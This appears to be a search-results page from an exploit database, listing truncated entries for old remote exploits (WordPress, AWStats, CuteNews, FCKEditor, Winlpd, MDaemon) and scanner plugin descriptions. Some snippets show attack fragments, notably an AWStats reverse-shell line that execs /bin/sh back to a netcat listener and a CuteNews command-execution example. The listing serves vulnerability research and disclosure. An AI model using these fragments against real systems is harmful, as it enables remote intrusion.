902 matches found
HP OpenView OmniBack II Generic Remote Exploit
No description provided by source. / HP OpenView OmniBack II generic remote Exploit by DiGiT - [email protected] Omniback is a network backup system by HP, widely used. took me some time to figure out how omniback communicated then it was just a matter of finding a bug. This lovely little exploit wi...
PHP-Post <= 1.01 (template) Remote Code Execution Exploit
!/usr/bin/php -q -d shortopentag=on ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+...
VulnCheck KEV: CVE-2004-1464
Cisco IOS contains an unspecified vulnerability that may block further telnet, reverse telnet, Remote Shell RSH, Secure Shell SSH, and in some cases, Hypertext Transport Protocol HTTP access to the Cisco device...
Canonical.txt
/ Microsoft Windows CanonicalizePathName Remote Overflow MSO6-040 More info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx Written by Preddy This is another version of hdm's metasploit version but ported to C, Works against Windows XP SP1 And it should give a crash on Win2k in...
Winlpd 1.2 Build 1076 - Remote Buffer Overflow
Winlpd 1.2 Build 1076 - Remote Buffer Overflow !/usr/bin/perl A proof of concept Remote Buffer Overflow Exploit App Vulnerable: Winlpd 1.2 Build 1076 - rabox.com Possibe some problems with WinXP if exploit doesn't work correctly, try another number in var 'loop'. Buffer size 524 bytes. Author:...
Winlpd 1.2 Build 1076 - Remote Buffer Overflow
!/usr/bin/perl A proof of concept Remote Buffer Overflow Exploit App Vulnerable: Winlpd 1.2 Build 1076 - rabox.com Possibe some problems with WinXP if exploit doesn't work correctly, try another number in var 'loop'. Buffer size 524 bytes. Author: Pablo Isola - [email protected] Neuquen ...
[Full-disclosure] *zeroday warez* MDAEMON LATEST VERSION PREAUTH REMOTE ROOT HOLE *zeroday warez*
MDAEMON LATEST VERSION PREAUTH REMOTE ROOT HOLE zeroday discovered by kcope kingcopeatgmx.net !!! shouts to alex,wY!,bogus,revoguard,adizeone Description There's a remotely exploitable preauthentication hole in Alt-N MDaemon. It is a Heap Overflow in the IMAP Daemon. It can be triggered by sendin...
WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit
Exploit for unknown platform in category web applications ========================================================= WordPress = 2.0.2 cache Remote Shell Injection Exploit ========================================================= !/usr/bin/php -q -d shortopentag=on ? echo...
WordPress Core 2.0.2 - 'cache' Remote Shell Injection
!/usr/bin/php -q -d shortopentag=on ? echo "--------------------------------------------------------------------\r\n"; echo "| WordPress = 2.0.2 'cache' shell injection exploit |\r\n"; echo "| by rgod [email protected] |\r\n"; echo "| site: http://retrogod.altervista.org |\r\n"; echo "| dork:...
AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit
Exploit for cgi platform in category web applications =============================================================== AWStats &CLIENT";openSTDOUT,"&CLIENT";openSTDERR,"&CLIENT";ifforkexec "/bin/sh"; exit0; ;''; class rbawstatsMigrate: url = '' user = '' password = '' auth = False chost =False...
AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit
No description provided by source. !/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from blacksecurity.org...
AWStats 6.5 - migrate Remote Shell Command Injection
AWStats 6.5 - migrate Remote Shell Command Injection !/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from...
AWStats 6.5 - 'migrate' Remote Shell Command Injection
!/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from blacksecurity.org 65.99.197.147 53377 id uid=81apach...
FCKEditor 2.0 <= 2.2 (connector.php) Remote Shell Upload Exploit
Exploit for unknown platform in category web applications ================================================================ FCKEditor 2.0 a short explaination: if a user cam call directly http://target/path/editor/filemanager/browser/default/connectors/php/connector.php he can upload malicious...
CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl cijfer-cnxpl - CuteNews =1.4.1 Remote Command Execution Copyright c 2005 cijfer [email protected] All rights reserved. 1. example cijfer@kalma:/research$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news [email protected] /$ id;uname -a uid=48apache...
VERITAS NetBackup Agent Detection
The remote host is running the VERITAS NetBackup Java Console service. This service is used by the NetBackup Java Console GUI to manage the backup server. A user, authorized to connect to this service, can use it as a remote shell with system privileges by sending 'commandEXECLIST' messages...
snmpXdmid overflow
The remote RPC service 100249 snmpXdmid is vulnerable to a heap overflow which allows any user to obtain a root shell on this host. SPDX-FileCopyrightText: 2001 Intranode Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders...
NNTP password overflow
The scanner was able to crash the remote NNTP server by sending a too long password. This flaw is probably a buffer overflow and might be exploitable to run arbitrary code on this machine. SPDX-FileCopyrightText: 2005 Michel Arboi Some text descriptions might be excerpted from a referenced source...
Helix RealServer Buffer Overrun
RealServer 8.0 and earlier and Helix Server 9.0 is vulnerable to a buffer overflow vulnerability. SPDX-FileCopyrightText: 2003 Montgomery County Maryland Government Security Team Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right...
dwhttpd format string
The remote web server is vulnerable to a format string attack. SPDX-FileCopyrightText: 2002 Michel Arboi Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...